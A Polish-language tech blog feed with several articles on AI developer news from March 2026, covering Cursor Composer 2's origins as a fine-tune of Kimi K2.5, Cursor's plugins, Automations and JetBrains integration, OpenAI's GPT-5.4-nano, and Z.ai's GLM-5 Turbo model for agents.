    Aktualizacje z marca 2026 roku, choć techniczne, pokazują wyraźny kierunek rozwoju platformy Claude. Anthropic nie tylko wypuszcza coraz potężniejsze modele, jak Opus 4.6 czy Sonnet 4.6, ale też konsekwentnie dopracowuje warstwę programistyczną – API, SDK i narzędzia deweloperskie.

    Dodanie pól capabilities i kontroli nad display w streamingu to kroki w stronę większej programowalności i kontroli. Platforma staje się nie tylko źródłem zaawansowanej sztucznej inteligencji, ale też przewidywalnym i dobrze udokumentowanym środowiskiem do budowania aplikacji. Dla deweloperów pracujących nad złożonymi agentami AI, systemami przetwarzania dokumentów czy narzędziami do modernizacji kodu, takie usprawnienia na poziomie API są bezcenne. Pozwalają skupić się na logice biznesowej, zamiast na ręcznym dostosowywaniu się do zmian w modelach.

  • Cursor Composer 2: Genialny model do kodowania, który tak naprawdę jest fine-tune’em chińskiego Kimi K2.5

    Cursor Composer 2: Genialny model do kodowania, który tak naprawdę jest fine-tune’em chińskiego Kimi K2.5

    Nowy model kodujący Cursor Composer 2 z miejsca wskoczył na wysokie pozycje w benchmarkach, bijąc nawet Claude Opus przy znacznie niższych kosztach. Szybko okazało się jednak, że za tym „własnym, najwyższej klasy modelem AI” firmy Cursor stoi inna, potężna technologia. Wszystko przez ujawniony w API identyfikator: kimi-k2p5-rl-0317. To bezpośrednie odniesienie do Kimi K2.5, flagowego modelu chińskiej firmy Moonshot AI.

    Sprawa wywołała gorącą dyskusję w środowisku deweloperów. Z jednej strony mamy świetne narzędzie, które faktycznie działa. Z drugiej – pytania o przejrzystość i uznanie dla prawdziwego źródła innowacji. Szczerze mówiąc, to jeden z ciekawszych technologicznych zwrotów akcji ostatnich miesięcy.

    Od premiery do kontrowersji: jak odkryto prawdziwe źródło

    Cursor ogłosił Composer 2 w marcu 2026 roku. Marketingowo przedstawiano go jako własny model klasy „frontier”, stworzony specjalnie do złożonych, wieloetapowych zadań programistycznych. Model miał być dostępny w edytorze Cursor oraz w wersji alfa nowego interfejsu o nazwie „Glass”.

    Już w ciągu 24 godzin od premiery deweloperzy przyglądający się odpowiedziom API odkryli prawdę. W logach i odpowiedziach systemu pojawiał się wewnętrzny identyfikator modelu, taki jak kimi-k2p5-rl-0317-s515-fast. To był jasny sygnał, że podstawą jest Kimi K2.5 od Moonshot AI. Plotki o braku przypisania autorstwa chińskiemu źródłu zaczęły krążyć natychmiast.

    Firma Cursor początkowo nie komentowała sprawy bezpośrednio w komunikacji marketingowej. Potwierdzenie przyszło później, między innymi poprzez wypowiedzi pracowników. Lee Robinson z Cursor wspomniał, że tylko około jednej czwartej mocy obliczeniowej wydanej na finalny model pochodziło z bazowego modelu Kimi, a reszta została poświęcona na własne procesy treningowe Cursor.

    Ostatecznie Moonshot AI publicznie potwierdził, że Kimi K2.5 stanowi fundament pod Composer 2, a wszystko odbywa się w ramach autoryzowanej współpracy komercyjnej poprzez platformę Fireworks. Kluczowy okazał się też zapis z licencji Kimi K2.5, który wymaga wyraźnego oznaczenia „Kimi K2.5” w interfejsie użytkownika produktów komercyjnych, jeśli przekraczają one próg 100 milionów aktywnych użytkowników miesięcznie lub 20 milionów dolarów miesięcznego przychodu.

    Composer 2 vs. konkurencja: liczby nie kłamią

    Niezależnie od źródła, wyniki modelu są imponujące. Benchmarki kodowania wyraźnie pokazują jego siłę. W CursorBench osiąga 61,3 punktu, w Terminal-Bench 2.0 – 61,7, a w SWE-bench Multilingual aż 73,7. To pozycjonuje go przed takimi gigantami jak Claude Opus.

    Co ważne, ten wynik osiągany jest przy znacznie niższym koszcie. Cursor celowo trenował model wyłącznie na danych kodowych, aby wyspecjalizować go w rozwiązywaniu złożonych, wieloetapowych problemów programistycznych. Model wspiera kontekst o długości 256 tysięcy tokenów.

    Jak stwierdził współzałożyciel Cursor, Aman Sanger, model ma bardzo konkretne zastosowanie: „Nie pomoże ci rozliczyć podatków. Nie będzie potrafił pisać wierszy”. To narzędzie dla deweloperów, a nie uniwersalny asystent.

    Prawdziwym przełomem jest cena. Spójrzmy na porównanie kosztów za milion tokenów:

    • Composer 2 (standardowy): 0,50 $ za wejście / 2,50 $ za wyjście.
    • Composer 2 Fast: 1,50 $ / 7,50 $ (ta sama inteligencja, szybsze odpowiedzi).
    • Claude Opus: 5,00 $ / 25,00 $.
    • GPT-4o: od 2,50 $ / 15,00 $ do 5,00 $ / 22,50 $, w zależności od długości kontekstu.

    Różnica jest kolosalna, zwłaszcza dla firm intensywnie korzystających z AI. Composer 2 oferuje podobną lub lepszą wydajność w zadaniach kodowych za ułamek ceny najdroższej konkurencji.

    Kim jest Kimi K2.5, czyli potęga chińskiego AI w tle

    Kim jest Kimi K2.5, czyli potęga chińskiego AI w tle

    Aby zrozumieć, z czym tak naprawdę mamy do czynienia, trzeba poznać model bazowy. Kimi K2.5 to chiński model open-weights Moonshot AI, jednej z czołowych chińskich firm zajmujących się sztuczną inteligencją.

    To potężna jednostka o architekturze Mixture of Experts (MoE) z 1 bilionem parametrów całkowitych i 32 miliardami parametrów aktywnych. Jego działanie ma być nawet do ośmiu razy tańsze niż Claude Opus. Co ciekawe, oferuje kompatybilność z OpenAI API, co znacząco ułatwia integrację. Model jest multimodalny – obsługuje tekst, obraz, audio i wideo, oferuje tzw. „długie myślenie” (long-thinking) oraz możliwość wywoływania funkcji (tool calling).

    Deweloperzy mogą uzyskać do niego dostęp bezpośrednio, bez pośrednictwa Cursor. Wystarczy klucz API z platformy Moonshot (platform.moonshot.cn), użycie bazowego URL https://api.moonshot.cn/v1 i wskazanie nazwy modelu jako kimi-k2.5. To pokazuje, że Cursor nie jest jedyną drogą do tej technologii, ale z pewnością dostarcza ją w formie zoptymalizowanej pod kodowanie.

    Burza w społeczności: marketing a rzeczywistość

    Burza w społeczności: marketing a rzeczywistość

    Odkrycie prawdziwej natury Composer 2 wywołało żywiołową reakcję społeczności deweloperskiej. Komentarze krążyły wokół tematu przejrzystości. „Cursor Composer 2 to po prostu Kimi K2.5 z RL” – pisali jedni. Inni dodawali: „Bycie KimiK2.5++ jest w porządku, brak transparentności już nie”.

    Warto przypomnieć, że to nie pierwszy raz, gdy Cursor buduje na cudzej technologii. Dyskusja toczyła się też wokół szerszych tematów: rosnącej roli otwartych i półotwartych modeli, ewentualnej reakcji firmy Anthropic (twórcy Claude) na tak bezpośrednie porównania, oraz wartości, jaką takie narzędzie wnosi do własnych, zamkniętych baz kodu w porównaniu do bardziej „agentowych” edytorów.

    Wiele osób podkreślało, że finalny produkt jest doskonały i działa znakomicie. Kontrowersje dotyczyły głównie warstwy komunikacyjnej i marketingowego nazywania modelu „własnym”. W świecie open source i współpracy korporacyjnej jasne przypisanie autorstwa jest często kluczowe dla zaufania.

    Wnioski: nowa era współpracy i specjalizacji

    Sprawa Cursor Composer 2 jest doskonałym studium przypadku dla współczesnego ekosystemu AI. Pokazuje wyraźnie kilka trendów. Po pierwsze, era monolitycznych, samodzielnie budowanych od zera modeli przez każdą firmę może się kończyć. Przyszłość leży w specjalizacji i fine-tuningu potężnych, ogólnych modeli bazowych, często pochodzących od wąskiej grupy liderów.

    Po drugie, granice geograficzne w technologii AI są coraz bardziej przepuszczalne. Zachodni produkt, który staje się hitem wśród deweloperów, może mieć serce zaprojektowane i wytrenowane w Chinach. To dowód na globalizację zaawansowanych badań.

    Po trzecie, społeczność techniczna jest niezwykle czujna. Marketingowe narracje są weryfikowane w ciągu godzin poprzez analizę logów, odpowiedzi API i porównania benchmarków. Przejrzystość staje się walutą, za którą płaci się zaufaniem użytkowników.

    Cursor Composer 2, będący w istocie fine-tune'em Kimi K2.5, pozostaje niezwykle atrakcyjnym narzędziem. Oferuje najwyższą klasę możliwości w zadaniach kodowych za bezprecedensowo niską cenę. Dla deweloperów i firm ta efektywność kosztowa i wydajność mogą być ważniejsze niż korporacyjne pochodzenie modelu. Ostatecznie w kodzie liczy się wynik. A ten, jak na razie, jest znakomity. Cała sytuacja służy jednak jako przypomnienie, że w erze współzależnych modeli AI uczciwość wobec użytkownika co do źródeł technologii jest równie ważna, co same osiągi.

  • Nowy model Cursor, Composer 2, łączy wysoką inteligencję kodowania z niższym kosztem

    Nowy model Cursor, Composer 2, łączy wysoką inteligencję kodowania z niższym kosztem

    Anysphere, firma stojąca za popularnym środowiskiem programistycznym Cursor, ogłosiła wydanie nowej, autorskiej wersji modelu AI do kodowania – Composer 2. To znacząca aktualizacja modelu Composer, która w ciągu zaledwie pięciu miesięcy przynosi duży skok jakościowy. Najważniejsze przesłanie? Frontierowa inteligencja w zakresie kodowania, ale w znacznie niższej cenie niż u konkurencji.

    Composer 2 jest już dostępny bezpośrednio w środowisku Cursor, co oznacza, że użytkownicy mogą z niego korzystać w ramach codziennej pracy z kodem. Firma mocno stawia na integrację modelu z własnym ekosystemem, podkreślając, że jest on specjalnie dostrojony do agentowego workflow, użycia narzędzi, edycji plików i operacji terminalowych oferowanych przez Cursor.

    Znacząca poprawa wyników benchmarków

    Cursor opublikował zestawienie wyników, które pokazuje wyraźny postęp w stosunku do poprzednich modeli z rodziny Composer. Nowa wersja osiąga lepsze wyniki w wewnętrznym CursorBench, Terminal-Bench 2.0 oraz SWE-bench Multilingual.

    Dla porównania, oryginalny model Composer osiągał znacznie słabsze rezultaty. To pokazuje solidny skok jakościowy w każdym z mierzonych obszarów. Szczególnie istotny jest przyrost w Terminal-Bench 2.0, który mierzy, jak dobrze agent AI radzi sobie z zadaniami w terminalu, czyli kluczowym elementem pracy programisty.

    Co ciekawe, firma nie twierdzi, że jej model jest bezkonkurencyjny. W Terminal-Bench 2.0 prowadzą modele konkurencji, jednak Composer 2 plasuje się przed innymi rozwiązaniami i własnym poprzednikiem. Taka szczerość buduje wiarygodność – Cursor nie obiecuje cudów, lecz konkretny, wymierny postęp.

    Przełom w ekonomii użytkowania: znacznie taniej

    Jeśli wyniki benchmarków mogą być postrzegane jako względne, to obniżka cen jest już absolutnie namacalna. To prawdopodobnie najsilniejszy atut marketingowy tego wydania. Composer 2 Standard kosztuje 0,50 USD za milion tokenów wejściowych i 2,50 USD za milion tokenów wyjściowych.

    To ogromna zmiana w porównaniu do poprzednich stawek. Firma wprowadza też wariant szybszy, Composer 2 Fast, który oferuje identyczny poziom inteligencji, ale wyższą przepustowość. Kosztuje on 1,50 USD za wejście i 7,50 USD za wyjście, co i tak stanowi znaczną obniżkę względem poprzedniej generacji.

    Cursor idzie o krok dalej i czyni szybszy wariant domyślnym dla użytkowników. To odważny ruch, który sugeruje, że priorytetem jest płynność pracy, a firma może zapewnić ją w konkurencyjnej cenie. Dla użytkowników planów indywidualnych zużycie Composer jest częścią osobnej puli z ogólnym limitem, co ułatwia kontrolę kosztów.

    Skupienie na zadaniach długofalowych

    Cursor nie oferuje po prostu lepszego autouzupełniania kodu. Kluczowym przesłaniem technicznym jest to, że Composer 2 został wytrenowany specjalnie pod kątem długofalowego kodowania agentowego.

    W praktyce chodzi o to, by model nie tylko napisał pojedynczą funkcję, ale potrafił prowadzić złożony, wieloetapowy proces: analizę repozytorium, podejmowanie decyzji o koniecznych zmianach, edycję wielu plików, uruchamianie poleceń, interpretację błędów i kontynuowanie pracy aż do osiągnięcia celu. To właśnie te "setki akcji", o których wspomina firma.

    Postęp w tej dziedzinie jest kluczowy, ponieważ wiele modeli świetnie radzi sobie z izolowanymi zadaniami, ale "gubi wątek" w dłuższych, sekwencyjnych procesach programistycznych.

    Kompresja w pętli uczenia: techniczny sekret modelu

    Aby rozwiązać problem długiego horyzontu planowania, zespół Cursor zastosował innowacyjną technikę treningu zwaną compaction-in-the-loop reinforcement learning. W dużym uproszczeniu: zamiast traktować podsumowanie kontekstu (gdy okno kontekstowe się kończy) jako zewnętrzny, odrębny krok, wbudowano tę funkcję bezpośrednio w proces uczenia się modelu.

    Jak to działa? Podczas treningu model jest celowo wypychany do limitu swojego okna kontekstowego. Następnie, za pomocą uczenia ze wzmocnieniem (RL), jest nagradzany za wygenerowanie "skompresowanej" wersji własnej historii, która pozwala mu pomyślnie dokończyć zadanie.

    Jeśli model przygotuje złe podsumowanie – na przykład pominie kluczową nazwę zmiennej czy informację o poprzednio naprawionym błędzie – zawiedzie w zadaniu i otrzyma ujemną nagrodę. Dzięki temu uczy się, które elementy historii są naprawdę istotne dla kontynuowania pracy.

    Według danych Cursor, to podejście znacząco redukuje błędy związane z kompresją kontekstu w porównaniu do wcześniejszych metod. Generowane podsumowania są też dużo wydajniejsze pod względem zużycia tokenów niż standardowe streszczenia tworzone na podstawie promptów. Pozwala to agentowi na pracę nad refaktoryzacją całego projektu bez utraty głównego celu.

    Cursor: mały gigant na rynku AI dla deweloperów

    Kontekst tego wydania jest nie mniej ciekawy niż sam model. Anysphere rozwija się dynamicznie. Firma zatrudnia około 400 osób, co w porównaniu do gigantów takich jak OpenAI, Anthropic czy Google, czyni ją stosunkowo małym graczem. Mimo to udaje jej się nie tylko rozwijać zaawansowane środowisko programistyczne, ale także tworzyć i szybko iterować własne, konkurencyjne modele. Wydanie Composer 2 w tak krótkim czasie pokazuje niezwykłe tempo innowacji.

    Podsumowanie: praktyczny krok naprzód

    Wydanie Composer 2 nie jest ogłoszeniem "zabójcy" modeli konkurencji. To pragmatyczna i prawdopodobnie bardziej użyteczna dla programistów propozycja. Cursor mówi: nasz model wszedł do wyższej ligi jakościowej, oferuje atrakcyjną ekonomię i jest głęboko zintegrowany z narzędziem, z którego i tak korzystasz.

    Dla deweloperów już pracujących w Cursorze aktualizacja do Composer 2 wydaje się oczywistym wyborem – oferuje lepszą wydajność za ułamek wcześniejszych kosztów. Dla osób rozważających zmianę środowiska to kolejny mocny argument. Firma pokazuje, że potrafi szybko dostarczać realną wartość, łącząc badania nad AI z praktycznymi potrzebami programistów. W świecie AI, gdzie wielkie, ogólne modele często kradną uwagę, Cursor konsekwentnie udowadnia, że głęboka specjalizacja i dopasowanie do konkretnego workflow użytkownika to potężna strategia.

  • Cursor znacząco rozszerza możliwości rozwoju o nowe pluginy, automatyzacje i wsparcie JetBrains IDE

    Cursor znacząco rozszerza możliwości rozwoju o nowe pluginy, automatyzacje i wsparcie JetBrains IDE

    Marzec 2026 przyniósł programistom korzystającym z Cursor, jednego z wiodących narzędzi do AI-driven development, prawdziwą lawinę nowości. Trzy kluczowe aktualizacje – rozbudowa Marketplace o nowe pluginy, wprowadzenie Automations oraz integracja z JetBrains IDE – mają na celu usunięcie barier między agentami AI a codzienną pracą inżynierską. To nie są drobne poprawki, lecz strategiczne posunięcia, które zmieniają Cursor z zaawansowanego edytora w centrum sterowania zautomatyzowanymi workflow.

    Chodzi o to, by agent AI nie był jedynie biernym asystentem odpowiadającym na pytania, ale aktywnym uczestnikiem procesu, który potrafi samodzielnie wykonywać zadania w całym stacku technologicznym. Brzmi futurystycznie? Najnowsze funkcjonalności pokazują, że to już rzeczywistość.

    Rozwój Marketplace: agenci zyskują dostęp do narzędzi

    Najważniejszą zmianą jest rozwój Cursor Marketplace. Katalog został rozszerzony o nowe pluginy, które dają agentom Cursor możliwość działania w zewnętrznych narzędziach. To nie tylko kosmetyka – pluginy umożliwiają agentom czytanie, zapisywanie i wykonywanie akcji.

    Co to właściwie oznacza w praktyce? Można poprosić agenta o wykonanie złożonego, między-narzędziowego workflow. Wcześniej takie zadania wymagały ręcznej pracy. Teraz agent, wyposażony w odpowiednie pluginy, może zająć się tym samodzielnie.

    Pluginy to coś więcej niż prosty dostęp do API. Często są budowane w oparciu o MCP (Model Context Protocol) do łączenia z narzędziami zewnętrznymi, co zapewnia kontekst i logikę potrzebną do sensownego działania. Jak zauważono w komunikacie Cursor: „To, co ma największe znaczenie dla sukcesu agenta, to dostęp do odpowiednich narzędzi i kontekstu. Pluginy to zapewniają… użytkownicy zgłaszają, że to połączenie jest znacznie potężniejsze”.

    Można wyróżnić kilka kluczowych kategorii:

    • Narzędzia produktywności i zarządzania: Pluginy pozwalają agentom współdziałać z narzędziami do zarządzania projektami i wewnętrznymi bazami wiedzy.
    • Infrastruktura i DevOps: Integracje otwierają drogę do zarządzania pipeline’ami CI/CD, monitorowania i operacji bazodanowych.
    • AI i modele: Pluginy ułatwiają pracę z modelami machine learning.

    Dla zespołów pojawiła się też opcja tworzenia prywatnych, wewnętrznych pluginów, co pozwala na bezpieczne dzielenie się autorskimi integracjami.

    Automations: zawsze włączone agenty reagujące na zdarzenia

    Automations: zawsze włączone agenty reagujące na zdarzenia

    Jeśli pluginy dają agentom „ręce” do działania, to nowa funkcja Automations daje im „zegar” i „czujniki”. Umożliwia budowanie zawsze włączonych agentów, którzy uruchamiają się automatycznie na podstawie zdefiniowanych wyzwalaczy (triggers) i instrukcji.

    Wyzwalacze mogą być dwojakiego rodzaju:

    1. Harmonogramy (Schedules): Agent uruchamia się o określonej porze, np. co noc, by przeprowadzić automatyczne testy lub wygenerować raport.
    2. Zdarzenia (Events): Agent budzi się do działania, gdy wystąpi określona akcja w zewnętrznym systemie. Obsługiwane są różne źródła zdarzeń. Przykład? Nowy issue o wysokim priorytecie może automatycznie uruchomić agenta, który przeanalizuje kod, znajdzie potencjalne przyczyny i zasugeruje fix.

    Kiedy automatyzacja się uruchomi, agent działa w bezpiecznym, chmurowym środowisku, korzystając ze skonfigurowanych modeli AI i pluginów (MCP). Co kluczowe, ma też dostęp do narzędzia pamięci, które pozwala mu uczyć się na podstawie poprzednich uruchomień i z czasem poprawiać swoją skuteczność.

    To potężne narzędzie dla vibe coding oraz automatyzacji hostingu i DevOps. Zamiast ręcznie prosić AI o pomoc przy każdym deploymencie czy incydencie, można skonfigurować agenta, który będzie czuwał nad procesem i reagował samodzielnie.

    Cursor wchodzi do JetBrains IDE

    Dla ogromnej rzeszy programistów Java, Kotlin, Python czy JavaScript, którzy na co dzień pracują w IntelliJ IDEA, PyCharm czy WebStorm, najważniejszą nowością może być integracja. Cursor stał się oficjalnie dostępny we wszystkich JetBrains IDE dzięki ACP (Agent Client Protocol).

    ACP to protokół JetBrains, który pozwala zewnętrznym agentom AI działać natywnie wewnątrz ich środowisk. W praktyce oznacza to, że nie trzeba porzucać ulubionego, potężnego IDE JetBrains, aby korzystać z zaawansowanych zdolności agentowych Cursor. Wystarczy zainstalować Cursor ACP z rejestru agentów w pluginie AI Assistant i zalogować się na swoje konto Cursor.

    Integracja ta jest dostępna dla użytkowników Cursor. Co zyskują?

    • Dostęp do modeli frontierowych: Można wybierać modele AI bezpośrednio w IDE.
    • Połączenie dwóch światów: Głęboka analiza kodu, refaktoryzacja, debugging i wszystkie zaawansowane funkcje JetBrains spotykają się z agentycznymi workflow Cursor, takimi jak planowanie zadań czy iteracyjne rozwiązywanie problemów.
    • Bezpieczny indeks kodu: Cursor wykorzystuje bezpieczne indeksowanie i wyszukiwanie semantyczne, by rozumieć duże, korporacyjne codebase’y, co w połączeniu z inteligencją JetBrains daje potężny kontekst.

    To wyraźny sygnał, że przyszłość nie leży w zamkniętych ekosystemach, lecz w interoperacyjności.

    Podsumowanie: Cursor buduje mosty, nie ściany

    Te trzy równoległe aktualizacje – pluginy, automatyzacje i integracja z JetBrains – układają się w spójną strategię. Cursor nie chce być kolejną zamkniętą „twierdzą” dla rozwoju z AI. Zamiast tego stara się być łącznikiem i platformą, która integruje najlepsze narzędzia deweloperskie z najbardziej zaawansowanymi modelami AI.

    Pluginy łączą agentów ze światem zewnętrznym, Automations dają im autonomię czasową i reaktywną, a integracja z JetBrains ACP otwiera drzwi dla milionów programistów, którzy nie chcą rezygnować ze sprawdzonych środowisk. To podejście „otwartego ekosystemu” jest dziś kluczowe. Deweloperzy nie chcą być zamykani w jednym rozwiązaniu – chcą elastycznie komponować swoje workflow z najlepszych dostępnych komponentów.

    Efekt? AI przestaje być ciekawostką w osobnym okienku, a staje się integralną, działającą w tle częścią procesu wytwórczego – od zarządzania projektem, przez pisanie i code review, po monitorowanie infrastruktury. To krok w stronę realizacji wizji, w której deweloper jest bardziej architektem i przewodnikiem, a powtarzalne zadania wymagające kontekstu wykonują za niego zautomatyzowani, inteligentni asystenci.

  • OpenAI udostępnia GTP-5.4 nano w API. To najmniejszy i najtańszy model z nowej rodziny

    OpenAI udostępnia GTP-5.4 nano w API. To najmniejszy i najtańszy model z nowej rodziny

    Od 5 marca 2026 roku deweloperzy korzystający z OpenAI API mają do dyspozycji nową, kompaktową broń w swoim arsenale. Jest nią GPT-5.4-nano, najmniejsza i najbardziej ekonomiczna wersja najnowszej rodziny modeli językowych od OpenAI. To nie kolejna iteracja dostępna w popularnym interfejsie ChatGPT, lecz narzędzie dedykowane wyłącznie programistom integrującym AI w swoich aplikacjach i usługach.

    Model został zaprojektowany z myślą o szybkości i wydajności kosztowej w zadaniach wymagających przetwarzania dużych ilości danych. Jego premiera w API to wyraźny sygnał, że OpenAI skupia się na potrzebach rynku deweloperskiego, oferując specjalistyczne rozwiązania do konkretnych zastosowań.

    Dostępność i cennik: API w roli głównej

    GPT-5.4-nano jest dostępny wyłącznie przez OpenAI API. Oznacza to, że przeciętny użytkownik końcowy nie znajdzie go w interfejsie czatu, co podkreśla jego profesjonalny, deweloperski charakter. Dostęp do modelu mają wszyscy programiści z aktywnym kontem OpenAI.

    Kluczowym atutem tego modelu jest jego przewidywalny i atrakcyjny cennik. OpenAI ustaliło stawki na poziomie 0,20 USD za 1 milion tokenów wejściowych oraz 1,25 USD za 1 milion tokenów wyjściowych. Takie podejście do wyceny ułatwia budżetowanie projektów i skalowanie usług bez obaw o niekontrolowany wzrost kosztów. W kontekście zadań o wysokim wolumenie, gdzie liczy się każdy ułamek centa, te liczby robią dużą różnicę.

    Specyfikacja modelu: mały, ale z wizją

    Choć nano jest najmniejszym członkiem rodziny GPT-5.4, nie jest to wyłącznie model tekstowy. OpenAI wyposażyło go w możliwości wizyjne. Obsługa obrazów wiąże się z nieco wyższym kosztem przetwarzania, choć szczegółowy mnożnik dla tokenów wizyjnych nie został publicznie ujawniony. To ciekawe połączenie: lekki, szybki i tani model, który potrafi interpretować nie tylko tekst, ale i grafikę.

    W porównaniu ze swoim poprzednikiem, GPT-5-nano, nowa iteracja stanowi znaczący upgrade. OpenAI zapewnia o poprawie wydajności w wielu wymiarach, choć konkretne benchmarki dla wersji nano nie zostały jeszcze szeroko upublicznione. Sam fakt, że model otrzymał nową numerację (5.4 zamiast 5), sugeruje, że zmiany są istotne, a nie tylko kosmetyczne.

    Gdzie gpt-5.4-nano sprawdzi się najlepiej?

    OpenAI jasno wskazuje rekomendowane scenariusze użycia. GPT-5.4-nano jest zoptymalizowany pod kątem zadań, w których priorytetem są szybkość i niski koszt, często kosztem maksymalnej, „głębokiej” mocy obliczeniowej.

    • Klasyfikacja to jeden z głównych przypadków użycia. Automatyczne sortowanie treści, tagowanie, przypisywanie kategorii – tam, gdzie decyzje są względnie proste, a wolumen duży, nano może być idealnym wyborem.

    • Ekstrakcja danych to kolejny obszar. Wyciąganie strukturyzowanych informacji z nieuporządkowanych tekstów, na przykład parsowanie faktur, wiadomości czy dokumentów, to praca, którą nano może wykonywać wydajnie i bez zbędnego obciążania budżetu.

    • Ranking to naturalne zastosowanie dla mniejszego modelu. Sortowanie wyników wyszukiwania, list produktów czy rekomendacji w oparciu o proste kryteria nie zawsze wymaga potęgi największych modeli.

    Ciekawą sugestią jest też wykorzystanie GPT-5.4-nano jako kodujących subagentów, które zajmują się prostszymi, pomocniczymi zadaniami w większym procesie (pipeline). Można sobie wyobrazić system, w którym główny, potężny agent planuje architekturę funkcji, a kilku „robotników” nano w tle pisze standardowy boilerplate code czy testy jednostkowe.

    Kontekst wydajnościowy: jak nano wypada na tle rodziny?

    Aby zrozumieć miejsce GPT-5.4-nano w ekosystemie, warto spojrzeć na osiągi jego większych braci. Pełnowymiarowy model GPT-5.4 osiąga imponujący wynik 67,3% sukcesów w benchmarku WebArena-Verified, który testuje praktyczne umiejętności korzystania z przeglądarki internetowej.

    Na jeszcze wyższym poziomie, 92,8%, plasuje się w zadaniach Online-Mind2Web, opartych na analizie zrzutów ekranu. To pokazuje, że cała rodzina GPT-5.4 jest niezwykle kompetentna w zadaniach wymagających rozumienia i interakcji ze złożonym, multimodalnym środowiskiem.

    GPT-5.4-nano, jako najmniejszy członek rodziny, nie będzie dorównywał tym wynikom w najbardziej wymagających testach. Jego siła leży gdzie indziej: w równowadze między przyzwoitą, bazową kompetencją a błyskawicznym czasem odpowiedzi i niskim kosztem. To model, który ma „wystarczająco dużo rozumu”, by poradzić sobie z wieloma rutynowymi zadaniami produkcyjnymi, nie zużywając przy tym środków na zbędną moc obliczeniową.

    Jak zintegrować GPT-5.4-nano? Prosta ścieżka dla deweloperów

    Dla programistów pracujących w Pythonie integracja jest błyskawiczna. Wystarczy upewnić się, że korzystają z najnowszej wersji oficjalnego SDK OpenAI. Aktualizacja za pomocą polecenia pip install openai --upgrade otwiera dostęp do nowego modelu poprzez standardowe wywołania API.

    To podejście jest spójne z filozofią OpenAI – minimalizacja barier wejścia dla programistów. Nie ma skomplikowanych procedur migracji, nowych bibliotek czy radykalnych zmian w kodzie. Nowa moc jest dostępna tam, gdzie deweloperzy już pracują.

    Podsumowanie

    Premiera GPT-5.4-nano w API to ważny krok w demokratyzacji dostępu do zaawansowanej sztucznej inteligencji dla biznesu. OpenAI, dostrzegając potrzeby rynku, oferuje nie tylko najpotężniejsze i najdroższe modele, ale też narzędzia skrojone pod realia produkcyjne: wysoką przepustowość, ograniczone budżety i potrzebę krótkiego czasu odpowiedzi.

    Ten model to propozycja dla tych, którzy chcą wdrożyć AI na szeroką skalę, automatyzując tysiące prostszych decyzji dziennie bez generowania astronomicznych rachunków. Jest dowodem na to, że ewolucja modeli językowych to nie tylko wyścig na liczbę parametrów, ale też głębsze zrozumienie różnych warstw potrzeb deweloperskich. GPT-5.4-nano może nie napisze przełomowych poematów, ale pomoże usprawnić działanie tysięcy aplikacji, czyniąc je inteligentniejszymi, szybszymi i tańszymi w utrzymaniu.

  • GLM-5 Turbo od z.ai: szybki model dla agentów AI dostępny na OpenRouter

    GLM-5 Turbo od z.ai: szybki model dla agentów AI dostępny na OpenRouter

    Cichy debiut, który może zmienić reguły gry w świecie automatyzacji. GLM-5 Turbo, najnowszy model fundacyjny od chińskiego dewelopera Z.ai (znanego też jako Zhipu AI), pojawił się właśnie na platformie OpenRouter. Nie jest to kolejna iteracja skupiona na ogólnych rozmowach. To specjalista zaprojektowany od podstaw do napędzania złożonych, wieloetapowych agentów AI, szczególnie w środowiskach takich jak OpenClaw.

    Dla deweloperów, zwłaszcza tych pracujących nad vibe codingiem, zaawansowanymi workflowami czy integracjami DevOps, to istotna wiadomość. Model obiecuje nie tylko wysoką prędkość, ale przede wszystkim niezawodność w kluczowych dla agentów zadaniach: wywoływaniu narzędzi (tool calling), planowaniu i długotrwałym wykonywaniu łańcuchów instrukcji.

    Czym jest GLM-5 Turbo i dlaczego powstał?

    GLM-5 Turbo to, jak wskazuje nazwa, wyspecjalizowana, szybka wersja modelu od Z.ai. Jego powstanie nie jest przypadkowe. Rynek narzędzi AI ewoluuje od prostych asystentów czatowych w stronę autonomicznych agentów, które potrafią samodzielnie wykonywać skomplikowane zadania, korzystając z zewnętrznych API, narzędzi deweloperskich czy systemów hostingowych.

    Klasyczne modele, nawet bardzo potężne, często mają z tym problem. Mogą „zgadywać” nazwę funkcji, mylić parametry lub gubić wątek w długim, wieloetapowym procesie. GLM-5 Turbo został poddany głębokiemu dostrojeniu (fine-tuning) już na etapie treningu pod kątem scenariuszy znanych z frameworka OpenClaw i podobnych. Jego głównym celem jest zapewnienie stabilności i precyzji w realnych workflowach agentowych.

    Kluczowe możliwości: nie tylko szybkość, ale i niezawodność

    Co dokładnie potrafi ten model? Specyfikacja techniczna i doniesienia z pierwszych testów wskazują na kilka istotnych filarów.

    • Precyzyjne wywoływanie narzędzi (Tool Calling) to jego wizytówka. Twórcy podkreślają, że model wzmocnił zdolność do precyzyjnego wywoływania zewnętrznych narzędzi i różnych umiejętności. W praktyce chodzi o to, by agent korzystający z tego modelu jako „mózgu” nie zawiesił się w połowie zadania przez błędnie sformułowane zapytanie do API. Ma to zapewnić większą stabilność w zadaniach wieloetapowych.

    • Składanie i wykonywanie złożonych instrukcji to kolejna mocna strona. GLM-5 Turbo ma lepiej radzić sobie z dekompozycją skomplikowanej prośby użytkownika (np. „zbuduj prostą aplikację do zarządzania zadaniami z backendem i frontendem”) na logiczną sekwencję mniejszych, wykonalnych kroków. To podstawa działania każdego zaawansowanego agenta.

    Model wspiera też zadania zaplanowane i długotrwałe. To ważne dla workflowów, które muszą działać w tle, czekać na dane lub wykonywać się przez dłuższy czas bez przerwy. Dodatkowo obsługuje do 128 tysięcy tokenów wyjściowych, co pozwala na generowanie obszernych odpowiedzi lub długich fragmentów kodu. Oferuje też streaming w czasie rzeczywistym, function calling oraz ustrukturyzowane dane wyjściowe (np. JSON), co ułatwia integrację z innymi systemami.

    Dla kogo jest ten model? Use case'y w web dev i DevOps

    GLM-5 Turbo nie jest modelem do pogawędek. Jego naturalnym środowiskiem są specjalistyczne narzędzia i automatyzacje. Szczególnie mogą na nim skorzystać osoby związane z inżynierią oprogramowania i infrastrukturą.

    W kontekście vibe codingu i web developmentu model może stanowić silnik dla zaawansowanych asystentów w edytorach kodu. Wyobraź sobie agenta, który nie tylko podpowiada fragment kodu, ale potrafi samodzielnie zaplanować refaktoryzację, uruchomić testy przez CLI, a potem wdrożyć poprawki na staging, korzystając z odpowiednich narzędzi. Stabilność w wywoływaniu funkcji jest tu kluczowa.

